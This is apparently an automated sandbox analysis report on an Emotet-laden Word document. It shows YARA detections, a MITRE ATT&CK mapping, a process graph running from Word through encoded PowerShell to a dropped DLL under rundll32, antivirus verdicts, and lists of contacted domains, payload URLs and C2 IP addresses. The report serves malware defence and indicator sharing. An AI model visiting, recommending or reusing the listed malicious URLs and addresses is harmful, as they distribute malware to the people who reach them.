                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 BlobJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000011.00000002.2222429242.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2338162997.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2336996681.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2189259516.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2148553869.0000000000710000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2127750584.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2180397123.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2197905867.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2168489304.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2188156936.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2336963149.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2198949244.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2210754308.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2133960367.0000000000170000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2208025145.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2124233296.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2134645958.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2157336224.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2113528268.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2113590423.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2134026009.0000000000260000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2177327005.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2148272205.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2197927518.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2157365734.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2124067211.0000000000140000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2208036737.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2217818929.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2159945715.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2170332868.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2177340948.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2217846238.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2149995465.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2188168029.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2168457347.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.260000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.290000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.710000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.290000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.6a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.710000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.6a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.220000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Disable or Modify Tools111OS Credential DumpingFile and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer4Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScripting22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information3LSASS MemorySystem Information Discovery15Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsExploitation for Client Execution3Logon Script (Windows)Logon Script (Windows)Scripting22Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsCommand and Scripting Interpreter211Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSecurity Software Discovery11Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsPowerShell3Network Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol14Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading21Cached Domain CredentialsProcess Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion2DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection111Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 344894 Sample: ARCHIVOFile-20-012021.doc Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 52 1.226.84.243:8080 unknown unknown 2->52 54 104.131.41.185:8080 unknown unknown 2->54 56 90 other IPs or domains 2->56 68 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->68 70 Multi AV Scanner detection for domain / URL 2->70 72 Found malware configuration 2->72 74 17 other signatures 2->74 15 cmd.exe 2->15         started        18 WINWORD.EXE 293 28 2->18         started        signatures3 process4 signatures5 86 Suspicious powershell command line found 15->86 88 Very long command line found 15->88 90 Encrypted powershell cmdline option found 15->90 20 powershell.exe 16 13 15->20         started        25 msg.exe 15->25         started        process6 dnsIp7 58 mrveggy.com 177.12.170.95, 443, 49167 IPV6InternetLtdaBR Brazil 20->58 60 riandutra.com 191.6.196.95, 49165, 80 IPV6InternetLtdaBR Brazil 20->60 62 4 other IPs or domains 20->62 50 C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll, PE32 20->50 dropped 78 Powershell drops PE file 20->78 27 rundll32.exe 20->27         started        29 rundll32.exe 25->29         started        file8 signatures9 process10 dnsIp11 33 rundll32.exe 27->33         started        64 84.232.229.24, 49175, 80 RCS-RDS73-75DrStaicoviciRO Romania 29->64 66 51.255.203.164, 8080 OVHFR France 29->66 84 System process connects to network (likely due to code injection or exploit) 29->84 signatures12 process13 process14 35 rundll32.exe 2 33->35         started        signatures15 76 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->76 38 rundll32.exe 35->38         started        process16 process17 40 rundll32.exe 1 38->40         started        signatures18 80 Hides that the sample has been downloaded from the Internet (zone.identifier) 40->80 43 rundll32.exe 40->43         started        process19 process20 45 rundll32.exe 1 43->45         started        signatures21 82 Hides that the sample has been downloaded from the Internet (zone.identifier) 45->82 48 rundll32.exe 45->48         started        process22

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      ARCHIVOFile-20-012021.doc48%VirustotalBrowse
                      ARCHIVOFile-20-012021.doc50%ReversingLabsDocument-Office.Trojan.GenScript

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll100%Joe Sandbox ML
                      C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll46%MetadefenderBrowse
                      C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll86%ReversingLabsWin32.Trojan.EmotetCrypt

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      16.2.rundll32.exe.1d0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      13.2.rundll32.exe.200000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      13.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      16.2.rundll32.exe.1b0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.2c0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      17.2.rundll32.exe.240000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.710000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.6a0000.0.unpack100%AviraTR/ATRAPS.GenDownload File
                      18.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.270000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      18.2.rundll32.exe.290000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.220000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.260000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      14.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      17.2.rundll32.exe.220000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      14.2.rundll32.exe.200000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      16.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.1f0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.200000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      17.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      15.2.rundll32.exe.200000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.290000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      14.2.rundll32.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      15.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      hbprivileged.com7%VirustotalBrowse
                      mrveggy.com5%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      https://norailya.com/drupal/retAl/100%Avira URL Cloudmalware
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://crl.use0%Avira URL Cloudsafe
                      https://ummahstars.com0%Avira URL Cloudsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      https://hbprivileged.comh0%Avira URL Cloudsafe
                      https://hbprivileged.com0%Avira URL Cloudsafe
                      https://norailya.com0%Avira URL Cloudsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      https://mrveggy.com/wp-admin/n/0%Avira URL Cloudsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      http://r3.o.lencr.org00%URL Reputationsafe
                      http://r3.o.lencr.org00%URL Reputationsafe
                      http://r3.o.lencr.org00%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      https://www.teelekded.com/cgi-bin/LPo/100%Avira URL Cloudmalware
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://servername/isapibackend.dll0%Avira URL Cloudsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                      http://r3.i.lencr.org/0%0%Avira URL Cloudsafe
                      http://riandutra.com/email/AfhE8z0/0%Avira URL Cloudsafe
                      http://calledtochange.org/CalledtoChange/8huSOd/100%Avira URL Cloudmalware
                      https://ummahstars.com/app_old_may_2018/assets/wDL8x/100%Avira URL Cloudmalware
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://riandutra.com0%Avira URL Cloudsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      https://mrveggy.com0%Avira URL Cloudsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      https://hbprivileged.com/cgi-bin/Qg/100%Avira URL Cloudmalware
                      http://r3.o.lencr.o0%Avira URL Cloudsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      https://www.teelekded.com/cgi-bin/LPo/P100%Avira URL Cloudmalware
                      http://calledtochange.org0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      hbprivileged.com
                      35.209.96.32
                      truetrueunknown
                      mrveggy.com
                      177.12.170.95
                      truetrueunknown
                      ummahstars.com
                      35.163.191.195
                      truetrue
                        unknown
                        riandutra.com
                        191.6.196.95
                        truetrue
                          unknown
                          calledtochange.org
                          75.103.81.81
                          truetrue
                            unknown
                            norailya.com
                            104.168.154.203
                            truetrue
                              unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://riandutra.com/email/AfhE8z0/true
                              • Avira URL Cloud: safe
                              unknown
                              http://calledtochange.org/CalledtoChange/8huSOd/true
                              • Avira URL Cloud: malware
                              unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.msnbc.com/news/ticker.txtpowershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpfalse
                                high
                                http://ocsp.sectigo.com0powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://norailya.com/drupal/retAl/powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://ocsp.entrust.net03powershell.exe, 00000005.00000003.2102092441.000000001B63D000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://certificates.godaddy.com/repository/0powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpfalse
                                  high
                                  http://crl.usepowershell.exe, 00000005.00000003.2092182578.000000001D0FC000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ummahstars.compowershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000005.00000003.2101978050.000000001B631000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.litespeedtech.compowershell.exe, 00000005.00000002.2111132973.0000000003B72000.00000004.00000001.sdmpfalse
                                    high
                                    https://hbprivileged.comhpowershell.exe, 00000005.00000002.2111189798.0000000003C06000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://hbprivileged.compowershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://norailya.compowershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2111132973.0000000003B72000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.icra.org/vocabulary/.powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116524892.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114817796.00000000020F7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124614651.0000000001EF7000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://mrveggy.com/wp-admin/n/powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
